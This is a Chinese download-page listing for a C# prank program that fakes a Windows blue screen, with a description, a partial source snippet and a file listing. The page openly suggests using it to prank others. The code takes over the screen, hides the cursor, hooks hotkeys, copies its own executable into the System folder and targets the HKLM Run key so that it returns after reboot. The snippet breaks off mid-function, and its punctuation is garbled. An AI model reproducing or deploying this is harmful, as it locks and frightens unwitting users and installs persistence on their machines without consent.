资源简介

这是一个模仿蓝屏的代码,运行后电脑蓝屏,就算重启也会出现,有需要的看看,可以拿来恶搞别人啊,相关代码都在里面,可以自己修改。

资源截图

代码片段和文件信息

using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Text;
using System.Windows.Forms;
using System.Runtime.InteropServices;
using System.Diagnostics;
using System.IO;
using Microsoft.Win32;
using System.Collections;

namespace Fools
{
    /// 
    /// 本程序有速特网制作:http://www.sooot.cn
    /// 由于时间仓促,未对代码进行优化,大家将就看吧。
    /// 欢迎到本站论坛一起学习讨论:http://bbs.sooot.cn
    /// 调试前请注意:本程序模仿死机和蓝屏。可在3秒内点击鼠标以解锁。
    /// 鼠标码:11211233312  (“1”为鼠标左键,“2”为鼠标右键,“3”为鼠标中键)
    /// 

    public partial class frmBlue : Form
    {
        #region field
        StringBuilder strBuilder = new StringBuilder();
        Random random = new Random();
        private static int randomInt = 0;
        private bool firstFlg = true;
        private DateTime time;
        private Queue queue = new Queue();
        string strs = “11211233312“;

        Hotkey hotkey = new Hotkey();
        private RegistryKey STARTKEY = Registry.LocalMachine;
        private const string REGKEY = @“SoftWare\MicroSoft\Windows\CurrentVersion\Run“;

        [DllImportAttribute(“gdi32.dll“)]
        private static extern IntPtr CreateDC(
        string lpszDriver // 驱动名称 
        string lpszDevice // 设备名称 
        string lpszOutput // 无用,可以设定位“NULL“ 
        IntPtr lpInitData // 任意的打印机数据 
        );

        [DllImportAttribute(“gdi32.dll“)]
        private static extern bool BitBlt(
        IntPtr hdcDest //目标设备的句柄 
        int nXDest // 目标对象的左上角的X坐标 
        int nYDest // 目标对象的左上角的X坐标 
        int nWidth // 目标对象的矩形的宽度 
        int nHeight // 目标对象的矩形的长度 
        IntPtr hdcSrc // 源设备的句柄 
        int nXSrc // 源对象的左上角的X坐标 
        int nYSrc // 源对象的左上角的X坐标 
        System.Int32 dwRop // 光栅的操作值 
        );
        #endregion

        public frmBlue()
        {
            InitializeComponent();
        }

        private void frmBlue_Load(object sender EventArgs e)
        {
            try
            {
                randomInt = random.Next();
                initQueue();

                if (randomInt % 2 == 1)
                {
                    BuildImage();
                }
                else
                {
                    SetErrorMessage();
                    this.BackColor = Color.DarkBlue;
                }

                this.WindowState = FormWindowState.Maximized;
                this.ShowInTaskbar = false;
                this.TopMost = true;
                Cursor.Hide();
                this.Focus();

                string copyPath = Environment.GetFolderPath(Environment.SpecialFolder.System) +
                    Application.ExecutablePath.Substring(
                    Application.ExecutablePath.LastIndexOf(@“\“)
                    Application.ExecutablePath.Length - Application.ExecutablePath.LastIndexOf(@“\“));

                if (!File.Exists(copyPath))
          

 属性            大小     日期    时间   名称
----------- ---------  ---------- -----  ----

     文件      43008  2009-03-26 23:13  Fools\bin\Debug\Fools.exe

     文件      30208  2009-03-26 23:13  Fools\bin\Debug\Fools.pdb

     文件       3822  2009-03-26 23:11  Fools\Fools.csproj

     文件        899  2009-03-26 23:10  Fools\Fools.sln

    ..A..H.     15872  2011-06-11 23:24  Fools\Fools.suo

     文件      11106  2009-03-26 23:10  Fools\frmBlue.cs

     文件       2677  2009-03-26 23:06  Fools\frmBlue.Designer.cs

     文件       6008  2008-12-31 19:12  Fools\frmBlue.resx

     文件       2742  2009-03-26 23:06  Fools\HotKey.cs

     文件       1065  2009-03-26 23:13  Fools\obj\Debug\Fools.csproj.FileListAbsolute.txt

     文件        849  2009-03-26 23:13  Fools\obj\Debug\Fools.csproj.GenerateResource.Cache

     文件      43008  2009-03-26 23:13  Fools\obj\Debug\Fools.exe

     文件        180  2009-03-26 23:13  Fools\obj\Debug\Fools.frmBlue.resources

     文件      30208  2009-03-26 23:13  Fools\obj\Debug\Fools.pdb

     文件        180  2009-03-26 23:13  Fools\obj\Debug\Fools.Properties.Resources.resources

     文件       4608  2009-03-26 23:11  Fools\obj\Debug\TempPE\Properties.Resources.Designer.cs.dll

     文件        844  2009-01-05 09:41  Fools\obj\Debug\VS.csproj.GenerateResource.Cache

     文件        235  2009-01-05 09:41  Fools\obj\VS.csproj.FileList.txt

     文件        857  2009-03-26 23:06  Fools\Program.cs

     文件       1494  2009-03-26 23:13  Fools\Properties\AssemblyInfo.cs

     文件       2834  2009-03-26 23:11  Fools\Properties\Resources.Designer.cs

     文件       5350  2008-12-01 14:39  Fools\Properties\Resources.resx

     文件       1103  2009-03-26 23:11  Fools\Properties\Settings.Designer.cs

     文件        249  2008-12-01 14:39  Fools\Properties\Settings.settings

     文件      25214  2009-01-04 14:00  Fools\setup.ico

     目录          0  2008-12-31 16:09  Fools\obj\Debug\Refactor

     目录          0  2009-03-26 23:11  Fools\obj\Debug\TempPE

     目录          0  2009-03-26 23:13  Fools\bin\Debug

     目录          0  2009-03-26 23:13  Fools\obj\Debug

     目录          0  2009-03-26 23:11  Fools\bin

............此处省略7个文件信息

评论

共有 条评论